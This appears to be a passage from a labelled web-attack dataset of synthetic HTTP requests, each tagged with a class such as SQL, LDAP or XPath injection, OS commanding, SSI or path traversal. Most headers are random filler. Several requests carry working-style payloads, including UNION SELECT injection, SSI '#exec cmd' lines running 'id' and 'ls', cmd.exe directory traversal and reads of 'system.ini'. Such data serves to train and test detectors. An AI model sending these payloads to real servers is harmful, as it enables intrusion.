Content-Location: http://dhe9aw.cz/E8sat/lumoIcl/iiap/olire.zip
Content-MD5: c3JyZW5kYXJwYWhlaURlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 19 Jul 06 06:29:07 CET
Last-Modified: Sun, 07 Nov 04 19:31:59 CET
Host: www.4bai7trCh.gov
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: gstfwit-eodsyh4d, agn-vamt, 2nlvXm-roamo;q=0.2, hsna-heo;q=0.4
Cache-Control: only-if-cached
Client-ip: 28.240.217.24
Cookie: cgnoh3isanu=2t+pti4 5n1eyv;N0U8dYoKEe=2039;Omy=jEbody-tc;vZdmthvprocessing-instruction=26;WkWFtF_bGT=586473;gjsdouu=relinktsnnph-]aaobjecte
Cookie2: $Version="3"
Date: Thu, 03 Dec 09 10:14:44 GMT
ETag: W/"VLYpnQMTVayQbUA@8m@f"
Expect: 100-continue
From: nareu4te@pple4n.it
If-Modified-Since: Tue, 17 Apr 07 21:06:11 UTC
If-Unmodified-Since: Mon, 03 Oct 05 11:18:39 GMT
If-Match: "Dk07Hk.Msl2S8Wbl"
If-None-Match: "ONA2@F2ihExyREdCQx"
If-Range: "LPtP9c-S14sq-.deVj_F"
Max-Forwards: 559
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nc=ceFf0a42
Range: 060649-
Referer: /irxy/eae0tc.swf
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/4.5 (compatible; Konqueror/8.7; Open BSD i586; wxoree; uapr3t)
UA-CPU: PowerPC
UA-Disp: 1845,7989,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3317x800
Via: 8.2 5.78.241.105:8678, 6.2 www.coranqsi.html, FTP/6.8 26.40.18.134
Transfer-Encoding: identity
Upgrade: bnd/1.0, Soltt/0.3, thel6o/5.8, isuyna/8.9
Warning: 200 169.156.209.196:92 "0oiSeraRieyyto" "Thu, 26 Aug 04 15:57:50 UTC"
X-Forwarded-For: 76.215.12.133
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

7ry-1GSp=)  (|    (Oa=ocrt*)&in6=5432&chhtt=363384

End - Id: 36940
Start - Id: 41690
class: SqlInjection
GET /.ls7aI.bin?a0t=fi%27++++UNION++++ALL+++SELECT+++osA++++FROM+++++de++WHERE++++%27%27+%3D%27 HTTP/1.0
Host: 209.123.161.199
Connection: close
Accept: text/html;q=0.2, audio/*
Accept-Charset: *;q=0.4
Accept-Encoding: gzip;q=0.1, compress;q=0.0, deflate;q=0.0, deflate;q=0.0
Accept-Language: ev2ltt-7m1ta;q=0.2, qbnmO-nemtEs;q=0.0, M-r
Cache-Control: no-transform
Client-ip: 173.78.32.144
Cookie: th=@cscriptm;execVbetweenIconnectSx95=lirdon8ssvhcopenW
Cookie2: $Version="7"
Date: Sun, 16 Oct 05 02:09:52 UTC
ETag: "rLGxCggwtE@E2OyW"
Expect: urn9xa
From: ube8gesO@rdptemmi.st
If-Modified-Since: Sun, 24 Aug 08 20:53:29 GMT
If-Unmodified-Since: Fri, 06 Nov 09 10:17:29 CET
If-Match: "xoPSHlY2Od6._xoDTKi"
If-None-Match: *
If-Range: "1TjoPZvynQQX@yLAV"
Max-Forwards: 4
MIME-Version: 2.8
Pragma: lnr5='2x'
Proxy-Authorization: NTLM bGVkbGpuZW1ucXRsb2JnZWJiZWVmVW0ycGVzbWxpaTRWbVNHeQ==
Authorization: Aato8 oEoat=n1i8daro
Range: 271923-
Referer: http://www.yhtab.it/osalwt.png
TE: gzip
Trailer: Max-Forwards
User-Agent: Vsfeo4ei
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0003x3071
Via: HTTP/7.0 www.meaeosto.jpg, hho/8.4 www.ssse.htm, FTP/9.8 www.p0iz3.png
Transfer-Encoding: ciwyit
Upgrade: Him/6.1, srtana/5.1, 5si/1.9, fHrl2k/2.1
Warning: 118 2.156.64.121 "naglietszhgs" 
X-Forwarded-For: 39.208.247.75
X-Serial-Number: 611965021882313
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41690
Start - Id: 38088
class: LdapInjection
GET /efeuOglrobptjh/tXCMFTWFhSd/sSBgrsw4GgcnBfcM/np7.QVwindow.openh@WVm24/nysV18q_Fz2QVNYU2.exe?kgCeYhtpassDaQ2positionf=%29++%28%7C+++%288m%3Dbcu*%29 HTTP/1.1
Host: www.e97ixjfo.org:28
Connection: lmjrsol
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip, deflate, identity, identity;q=0.9
Accept-Language: esneofAe-1Hly1re, itLdd-taSEba, t-cozq;q=0.8
Cache-Control: no-cache
Client-ip: 209.94.206.107
Cookie: vHuabrUdnsE=02854068;t5n=25;o1amlwrMnr=e;zay07zzrlMt=7448624;aZqSCrr6itql=iRlKa
Cookie2: $Version="74"
Date: Sat, 03 Mar 07 05:19:08 GMT
ETag: W/"WFlRn2_F0qiz2qXuNMV"
Expect: 100-continue
From: 7ptrd@s3eas2sne.fr
If-Modified-Since: Mon, 31 Dec 07 21:40:35 UTC
If-Unmodified-Since: Sat, 05 Jun 04 20:20:03 UTC
If-Match: *
If-None-Match: "NtTBkiQr7.qr_qJGPp"
If-Range: *
Max-Forwards: 580
MIME-Version: 7.3
Pragma: 2eiNanEg=sena7dln
Proxy-Authorization: Basic VDQ5QTpieGVt
Authorization: cesl ryuI1r1=sdsinmen
Range: 77-,76-
Referer: /tftoone/9Cgpl/Oate/2gWn8.php4
TE: deflate,trailers
Trailer: Pragma
User-Agent: qohmRdwekyooe
UA-CPU: 68000
UA-Disp: 119,1491,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3700x2595
Via: 1.0 81.223.53.197, HTTP/5.2 www.IeeEe.jpg, HTTP/6.6 98.168.5.53
Transfer-Encoding: 4nis; ohirt=itsrh2
Upgrade: sS7i/3.2, haaoxa/5.4, fair/8.2
Warning: 219 www.3ozcshh.html "dmg8ee" "Tue, 02 Sep 08 10:15:09 GMT"
X-Forwarded-For: 152.42.151.28
X-Serial-Number: 814494240740
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38088
Start - Id: 43695
class: OsCommanding
GET /file.bat/..��..��..��winnt/system32/cmd.exe/c dir C:georgi.asp/..��..��..��file.ext? HTTP/1.1
Host: 113.145.249.47
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: gzip, compress, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 152.233.157.213
Cookie: 7sh=yiItn;soUataenms=auh0f(linkulzc';Nos=5729338;Ttpto=1566;majhaseme=A execn5;hE13tFere=3428
Cookie2: $Version="51"
Date: Tue, 27 Jul 04 18:34:51 CET
ETag: "-4D7Jo4QjAO6o6dlRPcD"
Expect: 100-continue
From: y3oqSbyn@4aAdpOcPia.gov
If-Modified-Since: Fri, 17 Mar 06 16:05:05 CET
If-Unmodified-Since: Sat, 13 May 06 14:41:11 CET
If-Match: "mJJG3z@q5TiwxT8jCP@"
If-None-Match: "L6PRZ9JqVZTekuICg"
If-Range: *
Max-Forwards: 1
MIME-Version: 8.9
Pragma: 9ttnse7='lTntt'
Proxy-Authorization: csat8 fle0=tohc
Authorization: Digest algorithm=MD5
Range: 0932-655,7-822597,-7
Referer: http://www.6pypemos.org/0nneE/5docho/qsrtba.asmx
TE: trailers,deflate;q=0.7
User-Agent: calny/9.0.1.4.2
UA-CPU: StrongARM
UA-Disp: 911,720,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 0204x5029
Via: tn9/6.8 www.toau3rhr.jpg, ItiSp/3.9 www.oaao0u.tiff
Transfer-Encoding: compress
Upgrade: as8/8.8, mad/2.6, pEyuj/1.9, o5a8/8.7, ewmi2m/5.2
Warning: 158 www.shecn.js "Itetalhi5ooybnjthhbi" "Tue, 24 Jun 08 17:50:39 GMT"
X-Forwarded-For: 51.55.191.62
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 43695
Start - Id: 48732
class: XPathInjection
GET /ao6leitsieu3whefm2Ee/EZ4/bzdqomfl8nscct7iwmz/oredvebgn/bxJLos9Kn_Ybi/veooecsasthyrtle0/t@5P.C-B3.4bY.pl?aitm5eqr=lexeeel5e&mqtinldNcnanrsj=gt9rM_SL&UhavingW5hPXsock_streamlRh=whereesli&tad=gisd%27+or+1%3C++++9Sdsnm%2Ft3%2Faensd%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D34%5D+++or++++%27rUi2naoh%27++%3D++++%27&Teratuueoseo=uegGnsCIe5MchbSd9&Ehooaasts6=bj-t-PDJ&Fz_9taND1xaR=tYU.4-QWLiN8 HTTP/1.1
Host: 40.67.171.160
Connection: keep-alive
Accept: text/xml, audio/x-wav;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: 8oewnmo-e5M;q=0.4
Cache-Control: e='L1n'
Client-ip: 219.77.148.199
Cookie: fromndocumentUnwindow.openY4xGO=173832;teloz=a6c;psloat1sscb=utp=1idli2;giuequrctrs=ce?or
Cookie2: $Version="582"
Date: Sat, 20 Jun 09 12:00:02 CET
ETag: "BNYgiCLjg9lbGVfj_6"
Expect: thslw=abtirt;neba
From: wdlEt@aLnyEae.st
If-Modified-Since: Wed, 26 Dec 07 19:20:51 GMT
If-Unmodified-Since: Mon, 07 Aug 06 02:12:24 CET
If-Match: "bDjXKY.nSPaQoaf_@7"
If-None-Match: "ouf46Y8B3iLeq3WU1"
If-Range: Tue, 25 Mar 08 18:47:01 CET
Max-Forwards: 72
MIME-Version: 1.5
Pragma: dPAmoSs=4eiitot
Proxy-Authorization: Digest uri=/otrw4ske.cfm
Authorization: NTLM amVWcWFiMnNwcTM5b25obkhwT3RxdGhhZXkxdEV0RXI0U21OU0VsazVldG1jMw==
Range: 328-,-79624
Referer: /aC7nF/wlPgt/nutgdrtb/yesfthM/eguaox.bin
TE: trailers
Trailer: Upgrade
User-Agent: e18xdOSjw_ http://www.nsautg.be
UA-CPU: Sparc
UA-Disp: 383,7036,16
UA-OS: Windows 98
UA-Pixels: 0339x4942
Via: FTP/6.8 70.1.144.81, HTTP/3.9 168.125.121.166
Transfer-Encoding: gzip
Upgrade: tSnw/7.9, a5m/6.7, fogi0/2.6, alEi/8.0
Warning: 669 www.nfgu.shtml "3kai" 
X-Forwarded-For: 251.236.113.138
X-Serial-Number: 3865979
----: ------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48732
Start - Id: 39276
class: SSI
GET /ooTdeyl8y/une/bT/hem5em.php4?iii=8ignNl4&7aob0iyLjia=49&P1CQGfI2cV=e&raousIdoaDyssw=iw%29l&re=ite&gnanc9hb=utIY3nnryA&srs7=%2Ft8%24&sylcbirnoikyu=h7teanhesi&scriptJCn=metacdftptn+%5Cae&Bxmlcvcopyll0=3&oe=ntp5rw&QDo=%3C%21--%23email+fromhost%3D%22www.twmtain.com%22+tohost%3D%22mailbox.d3c.com%22+message%3D%22aigBl+epvc1om+dg+n0yw%22+fromaddress%3D%22oa89oE.com%22+toaddress%3D%22ryms.uywy.com%22+subject%3D%22tu4%22+sender%3D%2249t.com%22+replyto%3D%227qabl.com%22+cc%3D%22h5ft%22+inreplyto%3D%22olqt+sffn+rtsiT%22+id%3D%22n5ymail%22+--%3E&JNautoexec@q8qHR=%7Ce&hn2ltdrNas=%28qyE HTTP/1.1
Host: www.ohOu5lr.st
Connection: Efas
Accept: video/mpeg, application/zip
Accept-Charset: iso-2022-kr, x-mac-hebrew
Accept-Encoding: compress;q=0.7, gzip, compress;q=0.6, gzip
Accept-Language: *
Cache-Control: max-stale
Client-ip: 121.71.239.178
Cookie: ol=8e
Cookie2: $Version="26"
Date: Sun, 15 Nov 09 15:01:52 GMT
ETag: W/"7PpJzZ6D.Le.Qph7"
Expect: 100-continue
From: 0nenCi@cofr1.be
If-Modified-Since: Sun, 07 Nov 04 21:04:56 CET
If-Unmodified-Since: Sun, 18 Dec 05 03:53:40 CET
If-Match: *
If-None-Match: "YJ6_IBEgLCAuFLCve"
If-Range: Sun, 04 Jun 06 16:55:14 GMT
Max-Forwards: 27
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic aUFxb293YjpvaWFtaHBz
Authorization: NTLM dEVldWpycHRvZW50ZXpicHNtZXN4b2Vpdm50bjdobmFidQ==
Range: -219632,263179-06080,264504-7
Referer: http://www.eswo.be/asbU2/rnli3.sh
TE: chunked
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.4 (compatible; mg73anLk; Mac OS X; ohohDsdlm)
UA-CPU: MIPS
UA-Disp: 844,3342,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 320x017
Via: FTP/4.4 www.7stn.png:0, pbpm/4.8 www.ccahse.css
Transfer-Encoding: compress
Upgrade: dde/7.5
Warning: 014 58.200.111.202 "ltrIo" 
X-Forwarded-For: 184.183.83.71
X-Serial-Number: 04901
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39276
Start - Id: 40324
class: SSI
GET /telJlonaNrt/rZ7YvD7RlUVz3pXNH/xq2IU9qtWbWab/n1.aspx?ms7n=4120&24eNDHkY=023&1E52owrm=142&bos=g0ed4OteieeR&hrirIardhmpwynl=ieiXZMeE50&osfnhr2twtui=%7EoSst&amimI5=bM_w-&en8tflnfgb0=qslo&rmsrntrnt9iyoA=cMJC7%40Tx&dn3eaoehnleht=t6p3kbqH&3u=2&oaiv9pidtmn=%3C%21--++%23exec++cmd%3D%22c%3A%5Cprogra%7E1%5Cythrns%5Cy2xee7htD%5CqOuhaxTh.exe+++d%3A%5COIv8ami%5Cwww.tesetrleit.org%5Chmassc7tea%5Cdatabase.mdb+++++%2Fx+++exporttofoxpro%22--%3E&RTOM-R2Y=6D&tt=e9KZ3l HTTP/1.0
Host: 85.73.160.205
Connection: close
Accept: text/html, application/*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 239.88.55.52
Cookie: rcSdiA0lq=(n?rraeSte;rmhomeY2Ph5VhavingCR=42832;lypiu=rY86x5
Cookie2: $Version="171"
Date: Mon, 29 Nov 04 01:57:05 UTC
ETag: W/"3aL2s0eosA_dmr_vq"
Expect: z0lexn8
From: 5sd2@aayBcy.de
If-Modified-Since: Fri, 25 Jan 08 23:31:17 UTC
If-Unmodified-Since: Fri, 12 Mar 04 11:15:16 GMT
If-Match: *
If-None-Match: "lFpurYD-4izqy-e70u6P"
If-Range: "uEH-ZYdFlT4d-sgDc"
Max-Forwards: 98
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: intehp 4edI=sr6n1ysd
Authorization: NTLM dTFwbnVzZGVsZW81Y2dvc2RsQTF0bWc0aElubmNucmllYXRh
Range: -2115,0045-233,-51
Referer: http://www.hfeFkaa.be/apihsit/AhEdluem/neas8/u0anzp.php
TE: trailers,gzip;q=0.2
Trailer: If-None-Match
User-Agent: Mozilla/6.4 (X11; U; Linux i386 2.0; de-9s; rv:4.1.8) Gecko/81472915
UA-CPU: 68000
UA-Disp: 996,846,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8587x911
Via: 9.5 www.amWanad.html, 2.0 31.197.128.187:7, eNtc/4.0 www.jthliiEh.htm
Transfer-Encoding: identity
Upgrade: aTEi/5.9
Warning: 196 2.26.22.3:993 "ye78torehxsveoUeewSd" 
X-Forwarded-For: 114.213.56.41
X-Serial-Number: 475557970524
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 40324
Start - Id: 43533
class: OsCommanding
GET /zQtGIRrm/ttE04REtnnnrhahrt.tiff?lupm=q3linputcbinjsdJEm%3D3t&c4hZ0@=oSoTwtZ&T-LfyC7=gXEiti4servicesvtsna&rn52oolb=4439&09ihiiat2wrlGdx=%26otnnceoaw-Topts6aoa%28&tvcdIihey5hhsu=47&h7oek=523077&ttTtrridi=sVPl&whnr=0&iqnrtWian4whoo=%7Cid++%7C&ibsslRgT=6ena%5Cepooeieaak&Tjem7=28 HTTP/1.1
Host: www.ioceu0t.be:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: nc9entge-n, noxttwq-eecraoe, roe-paesllmt;q=0.2, ee-i3d;q=0.6, gneeomy-intae1a
Cache-Control: no-transform
Client-ip: 214.70.1.175
Cookie: Eit=a3be;abembp=sock_streamuobr
Cookie2: $Version="43"
Date: Mon, 26 Jan 04 12:22:06 GMT
ETag: W/"aavGB.agmn6xrluXFo8"
Expect: hhdoic
From: sLseahcS@fLazt.org
If-Modified-Since: Sun, 12 Jul 09 19:21:06 CET
If-Unmodified-Since: Fri, 21 Dec 07 23:04:08 GMT
If-Match: *
If-None-Match: "8ghp6dkd5PT6QcxKx3jU"
If-Range: "a7u6-YCtucnI9pfpAV4n"
Max-Forwards: 2668
MIME-Version: 8.9
Pragma: renh6='EEo'
Proxy-Authorization: Basic c2NndDpFRWhiaHQ0
Authorization: Digest qop=auth
Range: -983461,45-31195
Referer: http://www.9hlaTy.ch/8elqr9a/ddullCv/miiA/nnr3zee.asmx
TE: chunked,deflate;q=0.9,trailers
Trailer: Expect
User-Agent: Mozilla/8.5 (compatible; lunrtttyb; Linux i586; irto72ga)
UA-CPU: PowerPC
UA-Disp: 230,276,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 135x815
Via: HTTP/9.7 www.ere5A.jpg
Transfer-Encoding: deflate
Upgrade: hlpxo/5.8, ate/4.1, k9h/8.3, atf7/2.6
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 118.79.162.108
X-Serial-Number: 00610632074
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43533
Start - Id: 45563
class: PathTransversal
GET /d2etawgj/auc/st8WeQ/e7lx2caMR_dq./i4MbQicvEjOtfYJWHbqU/vp/ykbiXSk8m0-GmpQxz/eGIKKr1xUiF5xP/krouYLE3gom.cfm?RBs4cleiNae=5ncoat%3Eieg%3Cn%3D%3B&esie3oslasiyo=iz4yhWxnFH&tbnco=Rtookths&rrs=ukQwebWHr&ttow=%5Crioi%3CTHe&Asc2Ters=%7EnRaOawee&1Dsujcet=6WJAo&0doACYXsyiC=8oTooYTn2locationXa&htPbmit=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&fptsdhnysostcn8=aomiTsbilP8c&0_sock_streamThqlocationA=h5%3D2ePp+nplrirS&6@vYqwI=ggaletcxp_pfme%3Eee-2fn4e&YnGrX=maetieyfcmdemkef HTTP/1.0
Host: 169.76.92.91:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8;q=0.0, cp-932
Accept-Encoding: *
Accept-Language: tWyzH-saxwe, nf-jeot
Cache-Control: no-transform
Client-ip: 164.135.230.128
Cookie: -wgetuY2AsyN=j >((yh7shnwe;4ZZIoptBl7=ecdresinsertda9s|;jtjodU=]tecsnbm;sndaet3arTSEuJ=3;wmlstgtrdit=sXm84z;nnw6puA=83575925
Cookie2: $Version="88"
Date: Tue, 12 Sep 06 22:12:09 UTC
ETag: "Qlz3rPdG2rpqtnpu"
Expect: 7Sjsoaml
From: kccnlkv2@rodignu.de
If-Modified-Since: Fri, 28 May 04 19:58:07 CET
If-Unmodified-Since: Mon, 10 Aug 09 04:12:42 UTC
If-Match: "11bwj3vDHY1jqOy"
If-None-Match: *
If-Range: "Z@A5VKN5TR3g4pnbYeNg"
Max-Forwards: 24
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="E22F9eE11467e7b1deeE0c6f3c56A53a"
Range: -2
Referer: http://www.esouo.de/Zhiem/irno/nltapgn/ataic.sh
TE: deflate,gzip;q=0.2,gzip;q=0.7
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.0 (Machintosh; U; PPC Mac OS X 0.2; bl-8a; rv:1.5.4) Gecko/56064612
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 220x9820
Via: 5.6 20.210.5.114
Transfer-Encoding: compress
Upgrade: tvtmyl/0.9, dEhai/7.5, oiv8C/9.2, beNr/8.8, c9orN/8.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 145.196.47.34
X-Serial-Number: 86157391207979195
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45563
Start - Id: 42787
class: SqlInjection
PUT /lM.nVN0d9m6/mGz/ljYVQ9.ttK-Jdgn/vrkYQQ/reH2v75c8bbiee2/tgcrzc8dt5ED0sRnsnm/44Lnv/speeip/to2qsISsy/ln89CiLt/a9.gif? HTTP/1.0
Content-Length: 219
Content-Language: iJosrapi,yto,maiaemn
Content-Encoding: deflate
Content-Location: /eweeO/3tE2ra.css
Content-MD5: dG41b3VlZW5vZWh3dGVJag==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 Sep 09 08:28:02 CET
Last-Modified: Wed, 16 Dec 09 19:15:20 GMT
Host: 13.197.118.228
Connection: eeox9tr8
Accept: */*
Accept-Charset: windows-1255;q=0.5, windows-1252;q=0.8, x-mac-cyrillic, isiri-3342;q=0.2, gb2312
Accept-Encoding: deflate, compress;q=0.9, gzip;q=0.9
Accept-Language: iiCAyhsa-e0jbn, gho-qe, p7-6eniefMi;q=0.6, haOz3e-trRaiEo0, ej0-7sH
Cache-Control: dh=w0fcma
Client-ip: 247.133.72.171
Cookie: rh=v;ev6hi9eentihiaa=OR    'hsis1hlh8x' IN     (    '    '   );mstel=6907
Cookie2: $Version="6"
Date: Sun, 25 Dec 05 08:38:25 CET
Expect: enaew
From: hoc9Nr@eleoJto.be
If-Modified-Since: Wed, 28 Mar 07 19:21:14 CET
If-Unmodified-Since: Sat, 18 Aug 07 19:02:53 UTC
If-Match: "qK-UrgExMV_ftpP"
If-None-Match: "QhXKh5wD_T81Lu2"
If-Range: "xa-MtE_OjS7F5I8IjDZl"
Max-Forwards: 7
MIME-Version: 0.3
Pragma: ewotd='CFaT'
Proxy-Authorization: Basic ZThIaWM6WndjbXJlbg==
Authorization: pee9a Grir=alm5phOe
Referer: /ieohsuc1/saat/hstln/e9ubet/oweox4.jpg
TE: trailers
Trailer: Transfer-Encoding
User-Agent: sTla7rs36t/6.3
UA-CPU: PowerPC
UA-Disp: 3911,6242,16
UA-OS: Win95
UA-Color: color8
Via: 2.0 63.39.17.125
Transfer-Encoding: deflate
Upgrade: stc/5.1, oiaeq/5.4, e7all/9.3
Warning: 393 www.3DltPeb.htm:2 "doettossheNhudhp" "Wed, 18 Nov 09 21:46:55 GMT"
X-Serial-Number: 6456587299830575773
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

EW4r4xBphpS=form&i8Hnohxsie3toa=69124&aoh9s=iahullntoN5a&otwP=s3ynYp&orLc7wa=6506&cUIisU7Kw0= [Ihomen&kx8ridjs=mfKu&rexocA1tt=nieiemugmochaeldn&lyv=667637552&7hdtstfrt0e=o8glZ&surtl=rvyJQtu_WheM&eoo=/g&y3gPpr=409104

End - Id: 42787
Start - Id: 39948
class: SSI
GET /er9uq/s0/nieeniEtbgWNuowra3d/hpDS/dV1U1VF/te5twl7wjp/pKu/yOXNv3hhBkm/iofSAWunXukIP/mkTj3.css?prIrrdEMe=thfsls+%3Cn%40&yIi4hiaSt0a=030637536&ishfu=0878363&epsoDGEbA8.=%3C%21+%23%3C%21--+++%23exec++++cmd%3D%22id%22--%3E&vga=41077641&hcatKnFs8YW._=gltuww04sueshb&p4oseh=3691539&senttSlre=th0%7E&titu7no9oe7t=eYd&DgsYpositionk=86977&7ux=nph-6pe1bl%3Fm HTTP/1.0
Host: www.ejbmZ.fr
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.4
Accept-Language: sg-ai, Ormb-ru7pl, riectct-isookE92, sled-umd4cdsn, stis-kel
Cookie: rndIibdTrs=l=7
Cookie2: $Version="3"
If-Range: Sat, 03 Jul 04 05:58:11 GMT
Pragma: saoro5=tet
Authorization: NTLM M2pRZXhzc3BvbWphYXIxb25ncXZyODFkaGR0M3lkaW5wbGU=
Referer: /osbetp/s7hes/eote/Y9Uerjtr.jsp
TE: trailers
User-Agent: ilfhard1Enl5sgy
----: ---------------------------

null

End - Id: 39948
Start - Id: 40008
class: SSI
GET /nEboWR2NoTVzV_mxdi/hay/ibhlbl2edAope3aHh.gif?ruoAhhwts=ssam&NPicadropGl=6olao&niki=9oep%5Cr&tshEo=rhi&in=215012&owWde9aiaoh=%3C%21--+++++%23exec+cmd%3D%22%2Fbin%2Fls+++-l+++++%2Fhome%2FyiraHgwoa%2Fatb%22++--%3E&2xndOli=r+a&lauhqtetithse=9li&aqoWnAsge=edt&ld=8&nyutuodkyiTmoc=bindwinntn HTTP/1.0
Host: 41.47.167.246
Connection: dnleheta
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 133.142.247.233
Cookie: LzGIshutdownr9.P=izUliUqRO;HtdlTedqphsen1=mWawRkCT92pV;ettuf=10;5dtfaik=80
Cookie2: $Version="2"
Date: Mon, 09 Nov 09 24:23:39 GMT
ETag: W/".1jeLkNVQ5pd_jD-7"
Expect: hniFtla
From: l1ahde@nablau.fr
If-Modified-Since: Mon, 01 Dec 08 04:21:23 GMT
If-Unmodified-Since: Mon, 21 Dec 09 05:20:56 CET
If-Match: "I7rA8GDdpMZUlRoZtk"
If-None-Match: "G.26LtDMQVQIVc2ql"
If-Range: *
Max-Forwards: 694
MIME-Version: 9.8
Pragma: sL=ygcNu
Proxy-Authorization: ehoi omrlLio0=mhlctsr
Authorization: l6eean drgnj=ervo3i
Range: 4761-
Referer: http://www.v0yteas.st/onop.jpeg
TE: deflate;q=0.1,trailers
Trailer: Accept-Encoding
User-Agent: leoolddosyssbtDx
UA-CPU: Sparc
UA-Disp: 603,321,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 219x816
Via: FTP/8.2 221.151.74.10, HTTP/4.0 www.hnsHa.jpeg, HTTP/7.2 160.153.35.253
Transfer-Encoding: identity
Upgrade: iNatOe/5.8, 1TIi/6.0, rrnz/0.3, ale/7.7
Warning: 490 www.nelmaze.html "8xbzssdeyA" "Sat, 13 Jan 07 10:11:05 GMT"
X-Serial-Number: 18116
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40008
Start - Id: 38000
class: LdapInjection
GET /uiaEeapeoe4ngwseptn/_HKX@2qDKv15Bx/QEOUA3nullvQbetweenDerv/tfBVPJ@W4yWZJAy4x42/duednvn4o/UpZnadmin/ueuhsnu2e5xe/bmozshE0/txvoHKqTeZUDuSRbdA@j/e4nqIhee/MaWnboot.iniw4allGw8access_log.divu.gif?cydiitpxizOooBt=h%2BMechondroph%5C&temEtuTstjtI=4517984&nedk1o=8i%29%28%26%28objectClass%3D++++epo*%29 HTTP/1.1
Host: www.ms2u.de
Connection: close
Accept: text/html;q=0.0, video/*;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: ekar-eout7j, mg-hz
Cache-Control: max-stale
Client-ip: 206.83.241.99
Cookie: weeejqlsAero=a
Cookie2: $Version="2"
Date: Fri, 27 Jul 07 09:45:57 UTC
ETag: W/"UDst@tJde@GHR5NuG09g"
Expect: wrtnit=1nh0qhrn
From: inr9@eduqt.it
If-Modified-Since: Wed, 11 Aug 04 15:04:12 UTC
If-Unmodified-Since: Mon, 02 Nov 09 22:44:33 GMT
If-Match: *
If-None-Match: *
If-Range: "zGudF2_flf6avmA9H"
Max-Forwards: 4895
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Digest opaque="tnharvec"
Authorization: Nanms tss04f=nhld
Range: 3-,1-,28602-
Referer: http://mtte.fr/iad0t/WroAedef.doc
TE: trailers
Trailer: Connection
User-Agent: wtingmic (yfybJW0ptR; gfTVi17; lqBE@0; of-NadsuU)
UA-CPU: Sparc
UA-Disp: 8564,925,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 880x8476
Via: FTP/4.9 www.lonon.js, 6.8 www.nut8HaA.htm, 0.5 156.118.49.7
Transfer-Encoding: identity
Upgrade: retod/3.9, tel/3.9, std/6.9, btts/4.3
Warning: 461 www.3izrso.tiff "rrcdd92qh0Axrii" 
X-Forwarded-For: 69.225.134.146
X-Serial-Number: 800649
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38000
Start - Id: 49080
class: XPathInjection
